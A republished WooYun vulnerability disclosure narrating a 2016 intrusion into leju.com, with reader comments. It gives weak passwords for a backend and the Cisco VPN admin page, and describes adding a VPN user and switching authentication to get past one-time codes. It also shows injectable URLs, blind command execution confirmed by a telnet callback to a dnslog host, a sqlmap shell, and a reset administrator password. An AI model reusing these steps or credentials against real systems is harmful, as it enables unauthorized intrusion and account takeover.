对新浪乐居的一次渗透测试

admin
admin
admin
140559
文章
117
评论
2017年4月13日04:10:29评论317 views字数 199阅读0分39秒阅读模式
摘要

2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已经确认,细节仅向厂商公开
2016-04-11: 细节向核心白帽子及相关领域专家公开
2016-04-21: 细节向普通白帽子公开
2016-05-01: 细节向实习白帽子公开
2016-05-16: 细节向公众公开

漏洞概要 关注数(58) 关注此漏洞

缺陷编号: WooYun-2016-191286

漏洞标题: 对新浪乐居的一次渗透测试

相关厂商: leju.com

漏洞作者: if、so对新浪乐居的一次渗透测试

提交时间: 2016-04-01 09:12

公开时间: 2016-05-16 09:50

漏洞类型: 服务弱口令

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

9人收藏

漏洞详情

披露状态:

2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已经确认,细节仅向厂商公开
2016-04-11: 细节向核心白帽子及相关领域专家公开
2016-04-21: 细节向普通白帽子公开
2016-05-01: 细节向实习白帽子公开
2016-05-16: 细节向公众公开

简要描述:

谁能告诉我乐居和渣浪内网到底在不在一起?!!!

详细说明:

下班回来,打开电脑继续开始尝试漫游新浪之旅。。

看了半天,没啥进展,于是想到了公司分部网络可能相连,想先进乐居内网,再进新浪内网,最后走上一条不归路。

http://lx.leju.com 后台弱口令 admin 123 123

对新浪乐居的一次渗透测试

进入后台,存在注入

code 区域 
http://lx.leju.com:80/tongji/lixiangtj?city=2&moban=&type=1&form_id=9

type参数存在注入

对新浪乐居的一次渗透测试

注入出一些邮箱,开始尝试爆破,爆破未果。。。

后来发现重头戏了

https:://vpn.leju.com

对新浪乐居的一次渗透测试

思科的ssl vpn,还有一个动态密码验证,尼玛

由于之前的cisco-asa认证绕过漏洞,导致我对cisco ssl vpn很熟悉,于是访问https:://vpn.leju.com/admin

跳出来了管理员管理认证窗口,尝试admin admin 成功登陆。。。也是醉了,这么重要的密码竟然是弱口令。。

对新浪乐居的一次渗透测试

果断下载控制台,成功进入cisco ASDM 控制台

对新浪乐居的一次渗透测试

尝试添加用户访问SSLVPN

对新浪乐居的一次渗透测试

有个本地用户,果断添加一个,level15,acess full all 的用户

可是发现无法连接sslvpn,不管怎么设置,后来发现是因为认证是需要动态码的,可是对动态码配置不是很熟悉,翻遍了也没有找到管理接口在哪

折腾了好久,发现下面的东西

对新浪乐居的一次渗透测试

leju的vpn组认证方式是dkey的,也就是动态码,上面的都是本地用户,但是上面2个都没有启用,于是我想到,能不能先把leju的认证方式改成本地认证,然后等我连上,再把认证方式改成dkey的,并且祈求vpn不会断线,让我重新认证

对新浪乐居的一次渗透测试

果断开始改,成功连接vpn

对新浪乐居的一次渗透测试

再把认证方式该成dkey,最后竟然没有断开连接!!

对新浪乐居的一次渗透测试

下面就是漫游了,想搞清楚究竟内网和新浪内网到底在不在一起。

对新浪乐居的一次渗透测试

老规矩,列个内网域名

对新浪乐居的一次渗透测试

对新浪乐居的一次渗透测试

对新浪乐居的一次渗透测试

对新浪乐居的一次渗透测试

列举几个内部系统

搞了好久,最后得结论:内网不在一起,新浪是新浪,乐居是乐居!

内网渗透:

遇到个点,搞了好久,最后才进去,发现是自己傻逼了。。。

对新浪乐居的一次渗透测试

内网的web:http://10.207.0.180/

登陆存注入:

code 区域 
http://10.207.0.180/checkpwd.asp?ji=5&password=g00dPa%24%24w0rD&UserName=1

username存在注入,SqlServer ,sa权限

可以执行命令,但是不回显,并且本机没开1433,就下意识的以为SqlServer是其他机器,库站分离

对新浪乐居的一次渗透测试

毕竟内网这么多SqlServer,尝试盲执行命令,加个用户

对新浪乐居的一次渗透测试

也不知道会不回显,扫描了开启3389的机器,一台台去登陆,没有成功,觉得命令没有执行成功,尝试cloudeye

telnet jboss5.662472.dnslog.info 53

成功收到结果

code 区域 
01-Apr-2016 02:18:15.574 queries: client 202.106.196.219#28205 (jboss5.662472.dnslog.info): query: jboss5.662472.dnslog.info IN A -EDC (128.199.200.236)
 01-Apr-2016 02:32:25.804 queries: client 202.106.196.212#46002 (jboss5.662472.dnslog.info): query: jboss5.662472.dnslog.info IN A -EDC (128.199.200.236)

说明命令确实执行了,所以下面的任务就是确定内网ip

但是问题来了,我sql很渣,并且现在各大isp都封445端口,没法拷贝反弹程序到vps上,这里陷入了僵局。

后来想到了servername,毕竟内网机器名可以扫描到的

通过sql-shell执行

code 区域 
sql-shell> select @@servername
 [02:43:48] [INFO] fetching SQL SELECT statement query output: 'select @@servername'
 [02:43:49] [INFO] retrieved: SHICHANG
 select @@servername:    'SHICHANG'

成功得到servername,开启扫描器扫描

最后扫描出来了机器

对新浪乐居的一次渗透测试

。。。真是日了狗,就是本机,因为1433没对外开放。。。

那么为什么添加用户命令没有成功了?后来仔细一看是自己傻逼了

对新浪乐居的一次渗透测试

有一个/ ,这肯定是不能执行成功的,逗比了。。。

果断重置administrator密码。。 密码:xx.asd.8

对新浪乐居的一次渗透测试

搞完收工走人,洗洗睡。。

漏洞证明:

对新浪乐居的一次渗透测试

对新浪乐居的一次渗透测试

修复方案:

最后问一句厂商,内网到底和新浪在不在一起,有没有相通的?

版权声明:转载请注明来源 if、so@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-01 09:44

厂商回复:

谢谢您对乐居的关注,我们马上会对问题进行修复,再次感谢

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-01 09:41 | 珈蓝夜宇 ( 普通白帽子 | Rank:242 漏洞数:34 | 人不彻底绝望一次,就不会懂得什么是自己最...)

    1

    不在一起的

  2. 2016-04-01 09:52 | 新浪乐居(乌云厂商)

    1

    请问怎么给白帽子发礼物?

  3. 2016-04-01 09:56 | null_z ( 普通白帽子 | Rank:1012 漏洞数:115 )

    1

    @新浪乐居 来了这么多年还不知道怎么发礼物。。。。。

  4. 2016-04-01 09:58 | Coody 对新浪乐居的一次渗透测试 ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)

    1

    @新浪乐居 发礼物的事儿,你可以私聊我,嗯,不谢

  5. 2016-04-01 10:06 | PgHook ( 普通白帽子 | Rank:1020 漏洞数:123 | Portulaca grandiflora Hook.)

    1

    @Coody 哈哈,搞得很热心似的。。

  6. 2016-04-01 10:08 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

    1

    @新浪乐居 按也发过不少乐居的洞,给俺也来一发吧。

  7. 2016-04-01 10:16 | if、so 对新浪乐居的一次渗透测试 ( 核心白帽子 | Rank:1204 漏洞数:104 | Enjoy Hacking)

    1

    @新浪乐居 厂商私信我,哈哈

  8. 2016-04-01 10:38 | sqlfeng ( 普通白帽子 | Rank:721 漏洞数:86 | 江山父老能容我,不使人间造孽钱)

    1

    还有礼物~~~

  9. 2016-04-01 11:45 | 我是壮丁 对新浪乐居的一次渗透测试 ( 实习白帽子 | Rank:42 漏洞数:4 | 专业打酱油)

    1

    @if、so 我下次不逗你了。。。

  10. 2016-04-01 23:45 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力,而是努力了才...)

    1

    @if、so 今天愚人节,厂商说的你还真信了。。。。

  11. 2016-05-16 11:14 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白,外墙涂料,外墙保温,...)

    0

    添加用户命令没有成功,有一个/...请教如何修改的administrator密码,谢谢 @if、so

  12. 2016-05-16 18:07 | Jyhtpy ( 实习白帽子 | Rank:52 漏洞数:31 )

    0

    其实我更想问一下为什么有/会添加不成功,因为也遇到过这种

  13. 2016-05-16 19:40 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白,外墙涂料,外墙保温,...)

    0

    有一个/ @Jyhtpy

  14. 2016-05-16 19:47 | 老丁 ( 实习白帽子 | Rank:81 漏洞数:23 )

    0

    我能说曾经是乐居总部的么

  15. 2016-06-06 09:35 | 立志成为厨神的男人 ( 路人 | Rank:15 漏洞数:1 | 我饿了)

    0

    @老实先生 我还是不太明白……

  16. 2016-06-06 12:34 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白,外墙涂料,外墙保温,...)

    0

    其实我是装明白的 8mtb

  17. 2016-06-06 17:14 | 立志成为厨神的男人 ( 路人 | Rank:15 漏洞数:1 | 我饿了)

    0

    @老实先生 心里苦

  18. 2016-06-06 19:16 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白,外墙涂料,外墙保温,...)

    0

    呵呵,你会的时候,麻烦也告诉我一下,感谢,厨神

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin